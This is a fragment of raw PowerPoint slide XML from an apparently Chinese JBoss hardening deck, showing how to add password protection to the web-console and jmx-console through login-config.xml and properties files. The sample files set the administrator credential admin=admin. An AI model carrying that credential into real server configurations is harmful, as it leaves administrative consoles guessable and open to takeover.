                  <a:pt x="1039973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37" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2318385">
                <a:moveTo>
                  <a:pt x="10399737" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2318385">
                <a:moveTo>
                  <a:pt x="10409262" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10404500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2318385">
                <a:moveTo>
                  <a:pt x="9525" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2318385">
                <a:moveTo>
                  <a:pt x="10399737" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="2313089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2318385">
                <a:moveTo>
                  <a:pt x="10409262" y="2313089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399737" y="2313089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="2308326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="23130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851" y="1597723"/>
            <a:ext cx="10767695" cy="277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web-console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密码的方法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457834" marR="217170" algn="just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r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>安装目录</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server/default/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目录下建立这两个文件，文件内容可参考在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="75" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jmx-console</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>登 录的用户名和密码设置</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="944" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>中的两个相应的配置文件的内容</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>，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web-console-users.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件的内容 如下：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="915035" marR="25031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A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sample users.properties file for use with the UsersRolesLoginModule  admin=admin</a:t>
            </a:r>
            <a:endParaRPr sz="180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web-console-roles.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件的内容如下：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="915035" marR="25666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# A </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>sample roles.properties file for use with the UsersRolesLoginModule  admin=JBossAdmin,HttpInvoker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4968" y="3811270"/>
            <a:ext cx="637540" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="637540" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="637031" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63703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155700" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1155700" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1155192" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="115519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9368" y="1380540"/>
            <a:ext cx="1035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设置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jmx-console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密码的方法：类似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web-console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的设置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、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相同，只是去掉</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jmx-console </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>的注释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）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5191" y="1758695"/>
            <a:ext cx="10400030" cy="2555875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10400030" h="2555875">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399776" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399776" y="2555748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="255574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0188" y="1754682"/>
            <a:ext cx="10409555" cy="2564130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10409555" h="2564129">
                <a:moveTo>
                  <a:pt x="10404500" y="2564066"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2564066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2563837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2563164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2562110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="2560777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2559304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1040926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554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2559304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="2559304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409034" y="2560777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408348" y="2562110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10407294" y="2563164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10405973" y="2563837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="2564066"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="25641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2564129">
                <a:moveTo>
                  <a:pt x="1039973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37" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2564129">
                <a:moveTo>
                  <a:pt x="10399737" y="2559304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="2559304"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2564129">
                <a:moveTo>
                  <a:pt x="10409262" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10404500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2564129">
                <a:moveTo>
                  <a:pt x="9525" y="2559304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2559304"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2564129">
                <a:moveTo>
                  <a:pt x="10399737" y="2559304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2559304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="2559304"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="2564129">
                <a:moveTo>
                  <a:pt x="10409262" y="2559304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399737" y="2559304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="2554541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="25593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191" y="4546091"/>
            <a:ext cx="10400030" cy="1816735"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10400030" h="1816735">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399776" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399776" y="1816608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="181660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0188" y="4541735"/>
            <a:ext cx="10409555" cy="1825625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10409555" h="1825625">
                <a:moveTo>
                  <a:pt x="10404500" y="1825409"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1825409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="1825180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="1824494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1823440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241" y="1822119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1040926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15884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409034" y="1822119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408348" y="1823440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10407294" y="1824494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10405973" y="1825180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="1825409"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="18256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1825625">
                <a:moveTo>
                  <a:pt x="1039973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37" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="1825625">
                <a:moveTo>
                  <a:pt x="10399737" y="1820646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="1820646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="1825625">
                <a:moveTo>
                  <a:pt x="10409262" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10404500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="1825625">
                <a:moveTo>
                  <a:pt x="9525" y="1820646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1820646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="1825625">
                <a:moveTo>
                  <a:pt x="10399737" y="1820646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399737" y="1820646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="1825625">
                <a:moveTo>
                  <a:pt x="10409262" y="1820646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399737" y="1820646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404500" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="1815884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409262" y="18206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5191" y="1782940"/>
            <a:ext cx="10400030" cy="451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58293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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、打开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安装目录</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>“server”default“/conf</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>下的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login-config.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件，找到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jmx-console</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="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&lt;application-policy  name = "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jmx-console</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="16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&lt;authentication&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="825500" marR="3086735" indent="-1695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&lt;login-module code="org.jboss.security.auth.spi.UsersRolesLoginModule"  flag =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"required"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="825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&lt;module-option name="usersProperties"&gt; jmx-console-users.properties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&lt;/module-option&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="825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&lt;module-option name="rolesProperties"&gt; jmx-console-roles.properties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&lt;/module-option&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="65595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&lt;/login-module&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="16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&lt;/authentication&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="7905115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&lt;/application-policy&gt;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90805" marR="26225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dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>、在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>安装目录</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server/default/conf/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>目录下建立这两个文件，文件内容可参考在</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="65" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>web-console</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>登录的用户</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>名 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>和密码设置</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="840" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>中的两个相应的配置文件的内容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jmx-console-users.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件的内容如下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548005" marR="331342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# A sample users.properties file for use with the UsersRolesLoginModule  admin=admin</a:t>
            </a:r>
            <a:endParaRPr sz="16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Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jmx-console-roles.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件的内容如下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548005" marR="33699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# A sample roles.properties file for use with the UsersRolesLoginModule  admin=JBossAdmin,HttpInvoker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76888" y="3811270"/>
            <a:ext cx="515620" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="515620" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="515111" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515111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277620" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1277620" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1277112" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127711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开启日志功能的方法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277111" y="2734055"/>
            <a:ext cx="10400030" cy="3540760"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10400030" h="3540760">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399776" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399776" y="3540252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="354025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1689" y="2729966"/>
            <a:ext cx="10409555" cy="3549015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10409555" h="3549015">
                <a:moveTo>
                  <a:pt x="10404487" y="3548951"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3548951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="3548722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="3548049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="3546995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="3545662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104092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539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409021" y="3545662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408348" y="3546995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10407294" y="3548049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10405960" y="3548722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="3548951"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="35490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3549015">
                <a:moveTo>
                  <a:pt x="103997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25" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="3549015">
                <a:moveTo>
                  <a:pt x="10399725" y="3544189"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="3544189"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="3549015">
                <a:moveTo>
                  <a:pt x="10409250" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10404487" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="3549015">
                <a:moveTo>
                  <a:pt x="9525" y="3544189"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
